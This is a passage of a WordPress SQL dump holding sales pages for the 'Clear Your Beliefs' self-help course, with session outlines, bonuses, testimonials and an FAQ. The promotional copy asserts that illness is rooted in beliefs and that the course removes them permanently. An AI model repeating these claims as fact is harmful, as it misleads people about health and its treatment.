You''ll fail anyway. You don''t deserve happiness – look at you!"  </em>We were shamed into thinking that we were less than others.We learned to compare ourselves to others – and we always lose that contest.  Clear out any apparent limitations you''ve taken on, and find your true power to create what you want.  Do whatever you need to do in order to achieve your vision.</p>\n\nDo you have beliefs that stop you from dreaming big, or following through? Do you procrastinate or get distracted? In this session, you''ll eliminate those beliefs and relieve yourself of those symptoms. You''re already a master manifestor – you''re just manifesting your old programs!\n\n<p><strong> In Session 3, you will:</strong></p>\n\nIdentify old beliefs that stand between you and creating the life you want\nDissolve the old beliefs that get in your way over and over, or make you quit when you''re partway there.\nImagine what it means to live without self-imposed limitations, trusting that you can create anything you want\n\n<p><img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<h5>Session 4:   <strong>Clear Your Outdated Beliefs About Love and Relationships</strong></h5>\n\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess4.jpg"><img class=" wp-image-312 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess4-300x177.jpg" alt="sess4" width="237" height="141" /></a>In this session, you''ll delete beliefs that interfere with your personal relationships.</p>\n<p>If you''re married, are you happy and secure?   Or are you anxious about the future?   If you''re not in a relationship, what''s holding you back from finding your ideal mate?</p>\n<p>Humans are social creatures – we must relate to others to survive.  At our core, we want a security and safety, but we also want passion and romance.  You learned "what love is" from your parents – so it''s no wonder that you''re confused!  Most of us repeat patterns we learned from our early childhood.  We watched our parents interact, and Mom and Dad''s relationship became our model of what a relationship is supposed to look like.  In your family, love may have been  contaminated by disdain, contempt, withdrawal, or abuse.  We were programmed to repeat their patterns – without conscious choice.  This session looks at early infant bonding patterns and how those patterns get reproduced in our adult relationships unconsciously – until we change them.</p>\n\n<p>&nbsp;</p>\n\n<p><strong> In Session 4, you will:</strong></p>\n\nLook deeply into the childhood patterns that enabled you to survive and thrive\nSee which of your beliefs now interfere with your intimate relationships\nDiscover how easy it is to shift these beliefs at the core of the psyche and transform relationship difficulties into vibrant, loving interactions\n\n<p><img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<h5>Session 5:   <strong>Clear Your Old Beliefs About Money and Work</strong></h5>\n\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess5.jpg"><img class=" wp-image-313 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess5-300x200.jpg" alt="sess5" width="222" height="148" /></a>In this session, you''ll focus on money, wealth and abundance – or the lack thereof!</p>\n<p>What do you believe about earning a living in today''s economy?   Is money really the root of all evil?</p>\n<p>If you want to experience true abundance, you have to eliminate the belief that money is bad – or a problem.   Your current financial state is a reflection of the beliefs you inherited from your family, religion, and culture.   Can you see their influence?</p>\n\n<p><strong> In Session 5, you will:</strong></p>\n\nExamine your family and cultural beliefs about money, work, poverty and "deservingness."\nRemove beliefs that create stumbling blocks in the way of natural abundance\nCreate new beliefs that enable you to open to the flow of money and resources, and the life of abundance you want - and deserve\nLearn why affirmations alone, and the "Law of Attraction," don''t work, regardless of how diligently you practice them\n\n<p><img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<h5>Session 6:   <strong>Clear Uncomfortable Beliefs About Your Body and Health</strong></h5>\n\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess6.jpg"><img class=" wp-image-314 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess6.jpg" alt="sess6" width="205" height="136" /></a>In this session, you''ll focus on issues and problems with your health – whether they appear in your physical, emotional, mental or spiritual body.</p>\n<p>Ill health (dis-ease) is often the result of beliefs that were indoctrinated into you, or conclusions you came to when you came to certain conclusions during your early childhood.  What do you believe and perceive about your body?   Your health?  Your age?  Your vitality?  Your ability to heal?  The future of your health?</p>\n\n<p><strong> In Session 6, you will:</strong></p>\n\nIdentify old beliefs that stand between you and vibrant health\nRecognize beliefs that make you vulnerable to disease and injury\nDissolve old beliefs at the root of illness, bad habits and lifestyle stress\nImagine the healthy, vibrant body you want, and create it consciously with new beliefs\n\n<p><img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<h5>Session 7:   <strong>Clear Out The Rest Of The Junk In Your BeliefCloset!</strong></h5>\n\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess7.jpg"><img class=" wp-image-265 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess7-300x187.jpg" alt="sess7" width="214" height="134" /></a>In this final session, you''ll examine any remaining issues or challenges in your life, and learn how to use the <strong><em>BeliefCloset Process</em></strong> to eliminate them, one belief at a time.</p>\n<p>You''ll learn additional techniques for eliminating uncomfortable sensations and feelings, and open opportunities to experience the miracles of life.</p>\n<p>When you know that your feelings, perceptions, and circumstances are all created by your beliefs, and when you have a technique for identifying them and eliminating them, you''ll have the power of any Creator – the power to shape the world as you decide, creating a better place for you and those you love.</p>\n\n<p><strong> In Session 7, you will:</strong></p>\n\nScan your life for problems and interference, and put them under the <em>BeliefCloset</em> microscope so you can uproot negative core beliefs – where they live\nLearn to use the <em>BeliefCloset Process</em> on your own, anytime, so you can become the Captain of your fate – and your own experience – for the rest of your life\nFind your <strong>True Self</strong> – the creator of your reality – and recognize it as the truth of who you really are\n\n<p></p>\n<p>&nbsp;</p>\n<h1 id="bonus">You''ll Also Receive the <em>Clear Your Beliefs</em> <em>Bonus Collection</em></h1>\n<p>In addition to these seven transformational sessions, you''ll also receive these awesome bonus interviews and gifts.  These two world luminaries will complement your learning and progress during the course, and take your understanding and practice to an even deeper level.</p>\n<p>&nbsp;</p>\n\nBonus #1:  <strong>Love:  What Makes It So Confusing?\n<em>Guest Faculty: Carista Luminare, Ph.D.</em></strong>\n\n<p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/Carista-Portrait-3.jpg"><img class="alignleft  wp-image-1053" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/Carista-Portrait-3-232x300.jpg" alt="Carista Portrait 3" width="161" height="209" /></a>We all want more love in our life, but something keeps getting in the way.  We can''t seem to stop hurting each other. What''s going on?</p>\n<p>Lion interviews Carista Luminare, Ph.D., author of <em>Parenting Begins Before Conception</em>, President of Luminary Leadership Institute, and co-creator of <em>Confused About Love? </em> and <em>The Power of Love</em> program.  (She is also known as <em>Lion''s fiance''</em>)</p>\n<p>Carista shares the latest research on how our early bonding patterns with our parents play out repeatedly in our adult relationships.  We''re confused about what love is, and how to love.  The answers are in our neurology, our earliest programming, and our beliefs about love and how to get it.</p>\n<p>Learn how to determine your own (and your partner''s) LoveStyle, using the <em>LoveStyle Profile Quiz </em>(Bonus # 2).  You''ll also get some practical tips for healing old wounds and bringing passion and security back into your relationship.\n<strong>\nCarista Luminare</strong>, Ph.D., is President of Luminary Leadership Institute.  She has 30 years experience as a consultant, counselor and coach to executives, entrepreneurs, and organizations.  Her comprehensive, holistic parenting methodology is described in her groundbreaking book, <em>"Parenting Begins Before Conception."</em>  In partnership with Lion, she developed LLI''s leading-edge evolutionary leadership program.   After graduating from Harvard University in Psychology and Social Relations in 1978, she pioneered educational and therapeutic programs focused on the integration of the personality and soul.</p>\n\n<p><img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\nBonus #2 <strong>- The LoveStyle Profile Quiz </strong>\n\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon21.jpg"><img class=" wp-image-242 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon21-300x100.jpg" alt="bon2" width="270" height="90" /></a>Take this 5-minute assessment to learn how your childhood bonding patterns impact your adult relationships. Developed by Carista Luminare and Lion Goodman, you''ll receive a complete ten-page report that introduces you to the 5 LoveStyles, and shows you where you are on each spectrum.</p>\n\n<p><img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\nBonus #3: <strong> The Spiritual Technology of Manifesting\nGuest Faculty: Anodea Judith, Ph.D. </strong>\n\n<p><img class=" wp-image-396 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon3.jpg" alt="bon3" width="189" height="169" />Why don''t affirmations and the Law of Attraction work?  You''ll learn why in this interview with internationally acclaimed author and teacher Anodea Judith, one of the world''s leading experts on the Chakras.  Her books have sold more than 500,000 copies worldwide.</p>\n\n<p>Lion and Anodea discuss the principles of Manifestation outlined in their book, <em>Creating On Purpose: The Spiritual Technology of Manifesting Through the Chakras.  </em>Beliefs are at the core of the manifestation process, and<em> t</em>heir book is a step-by-step manual for turning any dream into a reality by taking a single idea down through the chakras and into the real world.  You''ll receive the first two chapters of the book as Bonus #4, below.</p>\n\n<p>Anodea Judith, Ph.D. is the author of <em>Wheels of Life, Eastern Body/Western Mind, Creating On Purpose</em> (with Lion Goodman), and <em>The Global Heart Awakens</em>.  She leads workshops on the chakras, psychological development, and spiritual transformation in the U.S. and around the world.  Her books are considered classics in their field, and are used by many schools as textbooks for classes on healing and psychological development.</p>\n\n<p><img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\nBonus #4: <strong> Excerpt from the book, "<em>Creating on Purpose: The Spiritual Technology of Manifesting Through the Chakras"</em></strong>\n\n<p><strong><em><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/creating-on-purpose.jpg"><img class=" wp-image-475 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/creating-on-purpose-294x300.jpg" alt="creating-on-purpose" width="189" height="193" /></a>Creating On Purpose</em></strong> is a step-by-step guide to the manifestation process. In this free sample, you will:</p>\n\nBe called to awaken your already-powerful ability to create the life of your dreams\nLearn how the chakras represent two human challenges: <strong>liberation</strong> (from the bottom up) and <strong>manifestation</strong> (from the top down)\nUnderstand the 7 chakras as stepping stones along the path of the manifestation process\nGain an understanding of resistance, obstacles, and barriers that come up as you create what you want in life\nLearn a process that can strengthen your power of intention\n\n<p><img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\nBonus #5:<strong> Change Your Beliefs eBook</strong>\n\n<p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-your-beliefs-ebook.png"><img class=" wp-image-433 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-your-beliefs-ebook.png" alt="TYB Cover" width="159" height="206" /></a></p>\n\n<p>You''ll also receive a copy of Lion''s multimedia eBook, "<em>Clear Your Beliefs: Delete Your Limiting Beliefs and Transform Your Life.</em>" </p>\n<p>Lion explains the theory behind <em>The BeliefCloset Process</em>, and offers an explanation for why you do what you do, and why it''s so difficult to change your habitual patterns of thought and behavior. </p>\n<p>It''s a beautifully produced primer on beliefs – where they come from, how they affect us, and what it takes to change them.</p>\n\n<p><img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\nBonus #6: <strong>Complete Transcripts of the Course</strong>\n\n<p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/ReportsLanding.jpg"><img class="alignleft  wp-image-985" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/ReportsLanding-300x199.jpg" alt="ReportsLanding" width="148" height="98" /></a>You''ll also receive a <strong>complete set of downloadable PDF transcripts</strong> from the course, so you can refer to the material anytime in written form. This includes all 7 classes, plus two bonus interviews!</p>\n\n<p>&nbsp;</p>\n<h1 id="bonus">Your Professional Coaching Sessions</h1>\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/support.jpg"><img class=" wp-image-318 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/support-300x254.jpg" alt="support" width="195" height="165" /></a>If you''re registering as part of a Clear Your Beliefs Coaching program, you''ll work with your <em>Clear Your Beliefs Coach</em> weekly. He or she will accompany you on your journey and guide you, step-by-step, through the process.</p>\n<p><em>Clear Your Beliefs Coaches</em> have been trained to help you deal with almost any issue, regardless of how long it''s been interfering with your life. Your coach will safely guide you down to the deepest levels of your psyche – which can be difficult to get to all by yourself – yet it''s where the most powerful changes occur.  He or she will meet with you by phone (or Skype) each week, on a day that fits your schedule, at a time that''s convenient for you.</p>\n<p>Your coach will guide you through any difficult inner terrain you might encounter, and help you identify and delete difficult-to-locate core beliefs.</p>\n<p><strong>[Note: Our coaches help you change your own beliefs and reduce or eliminate the impact they''ve had on your life. They are not licensed psychotherapists or physicians. If you have a medical or mental health issue, please consult an appropriate professional who specializes in your particular diagnosis.]</strong></p>\n<h1 id="package"></h1>\n<p style="text-align: right"><a href="http://clearyourbeliefs.com/program/#top">Up To Top</a></p>\n<p>&nbsp;</p>\n\n<h1>Purchase Today and You''ll Receive:</h1>\n<p><strong>Seven 90-Minute Class Sessions</strong> – Learn one of the world''s most powerful belief-change technologies, from the comfort of your own home. Each class session gives you the skill to easily change your beliefs – with 60 minutes of teaching followed by 30 minutes of Q&amp;A. Listen online, or download high-quality MP3s and listen anytime.</p>\n<h3 style="font-size: 20px">Plus: <em>The Entire BONUS Collection:</em></h3>\n\n<strong><em>What Makes Love So Confusing?</em> </strong>– Audio interview featuring Carista Luminare, Ph.D.\n<em><strong>The Spiritual Technology of Manifesting</strong></em> – Audio interview featuring Anodea Judith, Ph.D.\nYour Childhood Bonding Pattern Assessment: <strong><em>The LoveStyle Profile Quiz</em></strong>\n<strong><em>Creating On Purpose: The Spiritual Technology of Manifesting through the Chakras </em></strong> – The first 2 chapters from the book by Lion Goodman and Anodea Judith (PDF)\nMultimedia eBook: <strong><em>Transform Your Beliefs: Unleash Your Magnificence and Change Your World</em></strong> by Lion Goodman (PDF)\n<strong>A complete set of PDF Transcripts</strong> of all seven classes plus two bonus calls.\n<strong>Optional:</strong> Professional Coaching Sessions.\n\n<p>&nbsp;</p>\n\n<p>&nbsp;</p>\n<p><a href="http://clearyourbeliefs.com/products_categories/coaching" target="_blank">Register Now</a></p>\n<p style="text-align: center">OR</p>\n<p><a href="http://clearyourbeliefs.com/free-ebook" target="_blank">Free eBook</a></p>\n\n<p>&nbsp;</p>\n\n<h1>Satisfaction Guaranteed</h1>\n<p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar.jpg"><img class="size-medium wp-image-702 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar-300x131.jpg" alt="15dayguar" width="300" height="131" /></a>Your satisfaction is 100% guaranteed! If you don''t absolutely LOVE the Clear Your Beliefs program, and you don''t feel that it serves your growth and development, simply let us know within 15 days of your purchase, and we''ll happily issue you a full refund. You can keep the bonuses as our gift to you. (Refund policy applies only to the recorded program. CYB Coaches are responsible for their own refund policy and any refunds for unused coaching hours.)</p>\n<p>&nbsp;</p>\n<h1>About Lion Goodman</h1>\n<p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/02/lion-face.jpg"><img class="alignleft wp-image-303 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/02/lion-face-260x300.jpg" alt="lion-face" width="151" height="175" /></a>Lion is C.E.O. of Luminary Leadership Institute, a consulting firm dedicated to bringing leaders of businesses and organizations into alignment with their True Self and their highest virtues.</p>\n<p>He is the creator of <strong><em>The BeliefCloset Process</em></strong>®, and author of <em>Clear Your Beliefs: Delete Your Limiting Beliefs and Transform Your Life.</em></p>\n<p>He is the co-author, with Anodea Judith, of <em>Creating on Purpose: The Spiritual Technology of Manifesting through the Chakras</em> <em>.</em> With his partner, Carista Luminare, Ph.D., he created a program for couples and singles who want to create a more secure and passionate relationship:<em><strong> Confused About Love? The Keys to Creating a Secure and Passionate Relationship.</strong></em></p>\n<p>Lion has more than 35 years experience in transformational coaching, entrepreneurial business, spiritual practice, and men''s work. He is a co-founder of <em>The Tribe of Men</em>, an initiatory program for men, and served as Director of Men''s Programs for The Shift Network, where he created programs that served more than 20,000 people around the world. He blogs at www.GoodMenProject.com and www.YourTango.com.</p>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n\n<h1>Praise for Lion and Clear Your Beliefs</h1>\n\n<p><em>"You helped me resolve in a short time issues in my life that I''ve struggled with for years. In addition, I can use the tools you''ve taught me to deal with any difficult circumstance that may appear in the future."</em></p>\n<strong>– G. J., software developer</strong>\n<p><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<p><em>"Lion''s decades of experience in all facets of transformation combined with his profound love, great sense of humor and powerful commitment to humanity make him an outstanding facilitator for awakening and liberation. If you choose to work with him, you''ll grow to love him, as I do."</em></p>\n<strong>~ Stephen Dinan, CEO and founder, The Shift Network</strong>\n\n<p><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<p><em>"In just one BeliefCloset session, I experienced a subtle and profound shift in the way I relate to my children. It continues to enrich the way I''m able to be fully present with them each and every day."</em></p>\n<strong>~ Jamee Tenzer, Life Coaching for Working Women</strong>\n\n<p><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<p><em>"Thank you taking me back to the beginning to help me hit the "reset" button. You demonstrated your mastery and provided an unbelievable learning opportunity. Thank you for showing me that there are no limits in the Imaginal Realm, and for reinforcing the power that resides in the BeliefCloset Process. I am humbled and very grateful. I may never truly be able to comprehend all that happened and the changes to my mindset and my life. I wish I could put how I feel into words. My outlook is brighter, my steps seems lighter, and losing weight is now just an overdue task to take care of, without all the shame and emotions that had always been attached to it. "</em></p>\n<strong>~ S.K., Life Coach, Ontario, Canada </strong>\n\n<p><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<p><em>"What an extraordinary experience! The process is simple, straightforward, powerful, and FUN! Changing beliefs is no longer a heavy, ponderous, months-long process. I finished my session with a smile, and the anxiety triggered by my old beliefs has disappeared. My new ''belief-outfits'' are perfect for me, and I''m wearing them with joy and enthusiasm!"</em></p>\n<strong>~ D. T., Physical Therapist, Denver, CO </strong>\n\n<p><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<p><em>"The BeliefCloset Process is like a magic wand – I can easily and quickly change any aspect of myself by changing my beliefs."</em></p>\n<strong> ~ T. S., Business Owner, Yukon, Canada</strong>\n\n<p><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<p><em>"The BeliefCloset Process gave me the room to safely acknowledge and work through my hidden, unconscious beliefs. I am now free of the past and can see myself more clearly than ever before."</em></p>\n<strong>~ T. L., Healer, Stamford, CT </strong>\n\n<p><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<p><em>"I clearly saw how and why I was doing the things I do. I realized that my difficulties stemmed from my beliefs – especially those I was unaware of. I appreciate the sincerity and integrity of the BeliefCloset Process."</em></p>\n<strong> ~ R. D., Benedictine Priest, San Francisco, CA </strong>\n\n<p><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<p><em>"The BeliefCloset Process has been exceedingly helpful to me on my own internal journey, and it''s a tool I reach for frequently in my psychotherapy practice. It leads to discovery, insight, and change, often with an element of lyricism and poignancy. The explorations are both gentle and profound, and it provides rich material for reflection in the endlessly imaginative outfits that appear in the BeliefCloset. It provides real world results for my clients, and I continue to use, both in my practice and in my own personal growth."</em></p>\n<strong>~ Martha Bear, Psychotherapist, BeliefCloset Practitioner</strong>\n\n<p><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<p><em>"I uncovered beliefs I didn''t know I had, including: "I''m wretched. There is no God. I am ashamed of myself. I am unworthy of God." It was an intense process! Each time I deleted an old belief, something shifted at my core. I then replaced each one with a positive belief for my life. That old heavy weight around my heart just lifted off me. I''ve been in awe ever since. You''ve found a powerful way to access the deep subconscious mind!" </em></p>\n<strong>~ Maria Garcia, yoga teacher and BeliefCloset Practitioner</strong>\n\n<p><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<p><em>"This valuable tool will enhance your life in ways you cannot imagine. It''s added extraordinary value to my life. I feel calmer overall, and know I have a tool that will enable me to keep growing and expanding."</em></p>\n<strong>~ C.T., Performance and Life Coach</strong>\n\n<p><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<p><em>"I now feel empowered to create the life I want, and believe I can accomplish all my goals through shifting my thinking. I am no longer fearful of my limiting beliefs, because now I have a tool to change them."</em></p>\n<strong>– M.M., International Business Consultant</strong>\n\n<p>&nbsp;</p>\n\n<p>&nbsp;</p>\n<p><a href="http://clearyourbeliefs.com/products_categories/coaching" target="_blank">Register Now</a></p>\n<p style="text-align: center">OR</p>\n<p><a href="http://clearyourbeliefs.com/free-ebook" target="_blank">Free eBook</a></p>\n\n<p>&nbsp;</p>\n<h1>Satisfaction Guaranteed</h1>\n<p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar.jpg"><img class="size-medium wp-image-702 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar-300x131.jpg" alt="15dayguar" width="300" height="131" /></a>Your satisfaction is 100% guaranteed! If you don''t absolutely LOVE the Clear Your Beliefs program, and you don''t feel that it serves your growth and development, simply let us know within 15 days of your purchase, and we''ll happily issue you a full refund. You can keep the bonuses as our gift to you. (Refund policy applies only to the recorded program. CYB Coaches are responsible for their own refund policy and any refunds for unused coaching hours.)</p>\n<p>&nbsp;</p>\n<h1>Frequently Asked Questions</h1>\n\n<p><strong>Q: What is a virtual course?</strong></p>\n\n<p>A: It''s a great way to engage with professional teachers from the comfort of your own home. All you need is a computer and an mp3 audio player. If you choose the option of working with a Clear Your Beliefs coach, you''ll work by phone or Skype at a time that''s most convenient to you.</p>\n\n<p>In addition to excellent guidance and feedback, you can ask questions and deepen your exploration of the course themes. Note that you will be calling your coach for your support sessions, and your telephone service provider will charge you according to your existing long-distance calling plan. You can use Skype or Google Voice to call your coach.</p>\n\n<p><strong>Q: How long will I have access to the course?</strong></p>\n\n<p>A: You can download the course recordings, transcripts, and bonus materials from our online media archive to your own computer, so you''ll have copies permanently. Your Passcode, issued upon purchase, will allow you access to the material on the site for one year from your date of purchase.</p>\n\n<p><strong>Q: Are there scholarships available?</strong></p>\n\n<p>A: We offer a limited number of partial scholarships each year, giving preference to veterans, to those in developing countries, and to those who are doing important but underpaid work. If you would like to apply for a scholarship, please send a written request to <a href="mailto:info@clearyourbeliefs.com">info@clearyourbeliefs.com</a>, with a description of your circumstances and your offer of what you can pay.</p>\n\n<p><strong>Q: What is your refund policy?</strong></p>\n\n<p>A: Your satisfaction with this course is our highest priority! If you find within 15 days of purchase that the course is not meeting your needs, or the process is simply not working for you, please send a description of your concern to <a href="mailto:support@clearyourbeliefs.com">support@clearyourbeliefs.com</a>. If we cannot address your concerns and make it work for you, we offer a full refund (minus any used coaching time) so you can try out the course risk-free. No refunds are available after 15 days from your date of purchase.</p>\n\n<p><strong>Q: How can I reach Customer Support?</strong></p>\n\n<p>A: Please send an email to <a href="mailto:support@clearyourbeliefs.com">support@clearyourbeliefs.com</a>. We''ll get back to you within 48 hours (sometimes longer over weekends).</p>\n\n<p><strong>Q: What is your Privacy Policy?</strong></p>\n\n<p>A: We take your privacy very seriously. Your name and email are never shared with any other organization or person. We add your name and email to our customer database, and periodically send you newsletters and announcements with information about our programs and products. Our mailing list includes a number of brands, so you may see emails from <a href="http://www.ClearYourBeliefs.com" target="_blank">ClearYourBeliefs.com</a>, <a href="http://www.BeliefCloset.com" target="_blank">BeliefCloset.com</a>, or <a href="http://www.ConfusedAboutLove.com" target="_blank">ConfusedAboutLove.com.</a></p>\n\n<p>You may unsubscribe anytime you wish. Unsubscribing will opt you out of all of our communications, so you will not hear about our other opportunities or our curriculum.</p>\n\n<p>All information that you provide to your <em>Clear Your Beliefs Coach</em> will be held in strictest confidence, and will never be shared with anyone, with one exception: your Coach may communicate and consult with Lion Goodman for his support and for quality control purposes. He holds all personal information in the strictest of confidence, as well.</p>\n\n<p>// </p>\n&nbsp;', 'Partners', '', 'publish', 'open', 'open', '', 'p', '', '', '2015-05-12 13:01:43', '2015-05-12 18:01:43', '', 0, 'http://clearyourbeliefs.com/?page_id=2161', 0, 'page', '', 0);
INSERT INTO `cyb_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES
(2220, 2, '2015-07-08 00:25:21', '2015-07-08 05:25:21', '<img class="img-responsive"  src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg" alt="header" />\n\nFree eBook\n\n<img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="71" height="106" />\n<p class="tri-panel-p tri-panel-1st-p" style="text-align: center; padding-top: 30px !important; margin: 0px;"><strong>Get the free eBook.</strong></p>\n\nFIRST NAME *\n\nEMAIL *\n\nThe App\n<img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/iclearit-App-logo_FINAL-246x300.jpg" alt="download" width="89" height="87" />\n<p class="tri-panel-p tri-panel-2nd-p-1" style="text-align: center; margin-top: 32px;"><strong>Download the App</strong>\nfor iPhone &#038; iPad\n\n<p class="tri-panel-p tri-panel-2nd-p-2" style="text-align: center; font-size: 14px; margin-bottom: -4px; padding:0 5px;">Start Clearing Whatever Is In The Way Right Now!</p>\n\n<p class="tri-panel-p tri-panel-2nd-p-2" style="text-align: center; font-size: 14px; margin-bottom: -4px; padding:0 5px;">Only $4.99!</p>\nComplete Program\n<img style="margin-top: 0px !important; width: 100% !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/11/cyb-3rd-head.jpg" alt="" />\n\n<p class="tri-panel-p tri-panel-3rd-p" style="text-align: center; margin-top: 10px; font-size: 16px;"><strong>Clear Your Limiting\nand Negative Beliefs</strong> <strong>\n- Permanently!</strong>\n\n<p class="tri-panel-p tri-panel-3rd-p-2" style="text-align: center; font-size: 14px; margin-bottom: -2px; padding:0 5px;">A 7-week journey into your\nsubconscious mind to delete the beliefs that hold you back.\n\n<h2>The <em>Clear Your Beliefs</em> Program empowers you to...</h2>\n\nRelease pain and hurts from the past\nOpen to deeper, more profound love\nRecognize your true spiritual nature\nBecome more calm and less reactive\nRediscover the source of your personal power\n\nClear whatever stops you from taking action\nOpen yourself to new possibilities of success\nEliminate blocks and barriers easily\nDiscover your true purpose\nExpress your true magnificence\n\n<h2>How and Why It Works So Well</h2>\n\nBeliefs are the major cause of unhappiness, upsets, and limitations.\nThe <em>Clear Your Beliefs Program</em> eliminates beliefs at the core of the psyche.\nThe process utilizes all three levels of the mind: Subconscious, Conscious, and Superconscious.\nYou''re in charge – you decide what you want to believe, and how far you want to go.\nThe program guides you, gently, step-by-step, through the entire process of deleting beliefs.\nUnlike other methods, the changes you make are permanent – your old beliefs don''t come back.\n\n<h2><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />A Note from Lion Goodman</h2>\n<p style="font-size: 1.1em;"><strong>Creator of the <em>Clear Your Beliefs</em> program.</strong></p>\nI’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with dozens of methods of psychological growth, spiritual practice, and esoteric disciplines. At the same time, I was also a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.\n\nAll of this experience has culminated in the programs I offer here. Throughout my journey, I discovered the power of beliefs. Because beliefs actually create our experience, we can change our experience by changing our beliefs. This includes the beliefs we hold about ourselves, about others, and about the world. Beliefs are not "right or wrong," "good or bad," or "true or false." They''re simply tools we use to shape our reality.\n\nSo the important questions are:\n\n<em style="margin-left: -6px;">What do I want to experience?</em>\n<em style="margin-left: -6px;">What belief is creating this experience I don''t want?</em>\n<em style="margin-left: -6px;">How can I change my belief so I can change my experience?</em>\n\n<strong>This is 